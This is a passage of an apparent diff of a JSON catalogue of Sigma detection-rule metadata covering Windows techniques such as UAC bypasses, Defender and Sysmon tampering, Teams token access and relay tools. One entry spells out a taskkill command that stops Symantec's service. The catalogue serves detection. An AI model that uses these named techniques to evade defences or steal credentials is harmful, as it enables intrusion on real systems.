[ - "attack.defense_evasion", - "attack.t1562.002" - ], - "creation_date": "2021/02/02", - "filename": "proc_creation_win_sus_auditpol_usage.yml", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", - "level": "high", - "falsepositive": [ - "Admin activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the usage of Sysinternals Tools due to accepteula option being seen in the command line.", - "uuid": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", - "value": "Usage of Sysinternals Tools", - "meta": { - "refs": [ - "https://twitter.com/Moti_B/status/1008587936735035392", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_eula_accepted.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "creation_date": "2017/08/28", - "filename": "proc_creation_win_sysinternals_eula_accepted.yml", - "author": "Markus Neis", - "level": "low", - "falsepositive": [ - "Legitimate use of SysInternals tools", - "Programs that use the same Registry Key" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of Sysinternals PsService for service reconnaissance or tamper", - "uuid": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", - "value": "Use of Sysinternals PsService", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psservice", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml" - ], - "tags": [ - "attack.discovery", - "attack.persistence", - "attack.t1543.003" - ], - "creation_date": "2022/06/16", - "filename": "proc_creation_win_sysinternals_psservice.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of PsService by an administrator" - ], - "logsource.category": "process_creation", - 
"logsource.product": "windows" - } - }, - { - "description": "Detects the use of SharpEvtHook, a tool to tamper with Windows event logs", - "uuid": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", - "value": "SharpEvtMute EvtMuteHook Load", - "meta": { - "refs": [ - "https://github.com/bats3c/EvtMute", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ], - "creation_date": "2022/09/07", - "filename": "proc_creation_win_sysmon_disable_sharpevtmute.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect possible Sysmon driver unload", - "uuid": "4d7cda18-1b12-4e52-b45c-d28653210df8", - "value": "Sysmon Driver Unload", - "meta": { - "refs": [ - "https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_driver_unload.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" - ], - "creation_date": "2019/10/23", - "filename": "proc_creation_win_sysmon_driver_unload.yml", - "author": "Kirill Kiryanov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. 
CVE-2022-41120)", - "uuid": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", - "value": "Suspicious Sysmon as Execution Parent", - "meta": { - "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120", - "https://twitter.com/filip_dragovic/status/1590052248260055041", - "https://twitter.com/filip_dragovic/status/1590104354727436290", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml" - ], - "tags": "No established tags", - "creation_date": "2022/11/10", - "filename": "proc_creation_win_sysmon_exploitation.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects UAC bypass method using Windows event viewer", - "uuid": "be344333-921d-4c4d-8bb8-e584cf584780", - "value": "UAC Bypass via Event Viewer", - "meta": { - "refs": [ - "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", - "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" - ], - "creation_date": "2017/03/19", - "filename": "proc_creation_win_sysmon_uac_bypass_eventvwr.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", - "uuid": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", - "value": "Process Creation Using Sysnative Folder", - "meta": { - "refs": [ - 
"https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysnative.yml" - ], - "tags": [ - "attack.t1055" - ], - "creation_date": "2022/08/23", - "filename": "proc_creation_win_sysnative.yml", - "author": "Max Altgelt", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a Windows program executable started from a suspicious folder", - "uuid": "e4a6b256-3e47-40fc-89d2-7a477edd6915", - "value": "System File Execution Location Anomaly", - "meta": { - "refs": [ - "https://twitter.com/GelosSnake/status/934900723426439170", - "https://asec.ahnlab.com/en/39828/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ], - "creation_date": "2017/11/27", - "filename": "proc_creation_win_system_exe_anomaly.yml", - "author": "Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Exotic software" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "uuid": "07e3cb2c-0608-410d-be4b-1511cb1a0448", - "value": "Tamper Windows Defender Remove-MpPreference", - "meta": { - "refs": [ - "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tamper_defender_remove_mppreference.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/08/05", - "filename": 
"proc_creation_win_tamper_defender_remove_mppreference.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", - "uuid": "99793437-3e16-439b-be0f-078782cf953d", - "value": "Tap Installer Execution", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tap_installer_execution.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_tap_installer_execution.yml", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate OpenVPN TAP insntallation" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects one of the possible scenarios for disabling symantec endpoint protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", - "uuid": "4a6713f6-3331-11ed-a261-0242ac120002", - "value": "Taskkill Symantec Endpoint Protection", - "meta": { - "refs": [ - "https://www.exploit-db.com/exploits/37525", - "https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection", - "https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/09/13", - "filename": "proc_creation_win_taskkill_sep.yml", - "author": "Ilya Krestinichev, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", - "uuid": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", - "value": "Tasks Folder Evasion", - "meta": { - "refs": [ - "https://twitter.com/subTee/status/1216465628946563073", - "https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_task_folder_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.execution", - "attack.t1574.002" - ], - "creation_date": "2020/01/13", - "filename": "proc_creation_win_task_folder_evasion.yml", - "author": "Sreeman", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "uuid": "d2eb17db-1d39-41dc-b57f-301f6512fa75", - "value": "Suspicious Command With Teams Objects Pathes", - "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", - "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1528" - ], - "creation_date": "2022/09/16", - "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml", - "author": "@SerkinValery", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", - "uuid": "1012f107-b8f1-4271-af30-5aed2de89b39", - "value": "Terminal Service Process Spawn", - "meta": { - "refs": [ - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_termserv_proc_spawn.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" - ], - "creation_date": "2019/05/22", - "filename": "proc_creation_win_termserv_proc_spawn.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", - "uuid": "5589ab4f-a767-433c-961d-c91f3f704db1", - "value": "SMB Relay Attack Tools", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1557/001/", - "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", - "https://pentestlab.blog/2017/04/13/hot-potato/", - "https://github.com/ohpe/juicy-potato", - 
"https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes", - "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml" - ], - "tags": [ - "attack.execution", - "attack.t1557.001" - ], - "creation_date": "2021/07/24", - "filename": "proc_creation_win_tools_relay_attacks.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Legitimate files with these rare hacktool names" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", - "uuid": "3c05e90d-7eba-4324-9972-5d7f711a60a8", - "value": "UAC Bypass Tools Using ComputerDefaults", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_uac_bypass_computerdefaults.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/31", - "filename": "proc_creation_win_tools_uac_bypass_computerdefaults.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", - "uuid": "4e2ed651-1906-4a59-a78a-18220fca1b22", - "value": "NirCmd Tool Execution", - "meta": { - "refs": [ - "https://www.nirsoft.net/utils/nircmd.html", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://www.nirsoft.net/utils/nircmd2.html#using", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ], - "creation_date": "2022/01/24", - "filename": "proc_creation_win_tool_nircmd.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use by administrators" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", - "uuid": "d9047477-0359-48c9-b8c7-792cedcdc9c4", - "value": "NirCmd Tool Execution As LOCAL SYSTEM", - "meta": { - "refs": [ - "https://www.nirsoft.net/utils/nircmd.html", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://www.nirsoft.net/utils/nircmd2.html#using", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ], - "creation_date": "2022/01/24", - "filename": "proc_creation_win_tool_nircmd_as_system.yml", - "author": "Florian Roth, Nasreddine Bencherchali @nas_bench", - "level": "high", - "falsepositive": [ - "Legitimate use by administrators" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of NSudo tool for command execution", - "uuid": "771d1eb5-9587-4568-95fb-9ec44153a012", - "value": "NSudo Tool Execution", - "meta": { - "refs": [ - "https://nsudo.m2team.org/en-us/", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nsudo_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ], - "creation_date": "2022/01/24", - 
"filename": "proc_creation_win_tool_nsudo_execution.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate use by administrators" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects PsExec service execution via default service image name", - "uuid": "fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba", - "value": "PsExec Tool Execution", - "meta": { - "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_psexec.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ], - "creation_date": "2017/06/12", - "filename": "proc_creation_win_tool_psexec.yml", - "author": "Thomas Patzke", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of RunXCmd tool for command execution", - "uuid": "93199800-b52a-4dec-b762-75212c196542", - "value": "RunXCmd Tool Execution As System", - "meta": { - "refs": [ - "https://www.d7xtech.com/free-software/runx/", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_runx_as_system.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ], - "creation_date": "2022/01/24", - "filename": "proc_creation_win_tool_runx_as_system.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use by administrators" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", - "uuid": 
"62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", - "value": "Tor Client or Tor Browser Use", - "meta": { - "refs": [ - "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tor_browser.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090.003" - ], - "creation_date": "2022/02/20", - "filename": "proc_creation_win_tor_browser.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of TruffleSnout.exe", - "uuid": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", - "value": "Launch TruffleSnout Executable", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", - "https://github.com/dsnezhkov/TruffleSnout", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trufflesnout.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482" - ], - "creation_date": "2022/08/20", - "filename": "proc_creation_win_trufflesnout.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Identifies execution of nltest.exe and dsquery.exe for domain trust discovery. 
This technique is used by attackers to enumerate Active Directory trusts.", - "uuid": "3bad990e-4848-4a78-9530-b427d854aac0", - "value": "Domain Trust Discovery", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md", - "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", - "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", - "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", - "https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trust_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_trust_discovery.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, omkar72", - "level": "medium", - "falsepositive": [ - "Legitimate use of the utilities by legitimate user for legitimate reason" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", - "uuid": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", - "value": "UAC Bypass Using ChangePK and SLUI", - "meta": { - "refs": [ - "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b", - "https://github.com/hfiref0x/UACME", - "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_uac_bypass_changepk_slui.yml", - "author": 
"Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", - "uuid": "b697e69c-746f-4a86-9f59-7bfff8eab881", - "value": "UAC Bypass Using Disk Cleanup", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "proc_creation_win_uac_bypass_cleanmgr.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", - "uuid": "e66779cc-383e-4224-a3a4-267eeb585c40", - "value": "Bypass UAC via CMSTP", - "meta": { - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md", - "https://lolbas-project.github.io/lolbas/Binaries/Cmstp/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002", - "attack.t1218.003" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_uac_bypass_cmstp.yml", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate use of cmstp.exe utility by legitimate user" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "uuid": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", - "value": "UAC Bypass Using Consent and Comctl32 - Process", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", - "uuid": "853e74f9-9392-4935-ad3b-2e8c040dae86", - "value": "UAC Bypass Using DismHost", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "proc_creation_win_uac_bypass_dismhost.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", - "uuid": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", - "value": "UAC Bypass Using Event Viewer RecentViews", - 
"meta": { - "refs": [ - "https://twitter.com/orange_8361/status/1518970259868626944", - "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" - ], - "creation_date": "2022/11/22", - "filename": "proc_creation_win_uac_bypass_eventvwr.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", - "uuid": "7f741dcf-fc22-4759-87b4-9ae8376676a2", - "value": "Bypass UAC via Fodhelper.exe", - "meta": { - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_fodhelper.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_uac_bypass_fodhelper.yml", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate use of fodhelper.exe utility by legitimate user" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", - "uuid": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", - "value": "UAC Bypass via Windows Firewall Snap-In Hijack", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ], - "creation_date": "2022/09/27", - "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml", - "author": "Tim Rauch", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", - "uuid": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", - "value": "UAC Bypass via ICMLuaUtil", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2022/09/13", - "filename": "proc_creation_win_uac_bypass_icmluautil.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - 
"logsource.product": "windows" - } - }, - { - "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", - "uuid": "4cbef972-f347-4170-b62a-8253f6168e6d", - "value": "UAC Bypass Using IDiagnostic Profile", - "meta": { - "refs": [ - "https://github.com/Wh04m1001/IDiagnosticProfileUAC", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2022/07/03", - "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "uuid": "80fc36aa-945e-4181-89f2-2f907ab6775d", - "value": "UAC Bypass Using IEInstal - Process", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "proc_creation_win_uac_bypass_ieinstal.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "uuid": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", - "value": "UAC Bypass Using MSConfig Token Modification - Process", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml" - 
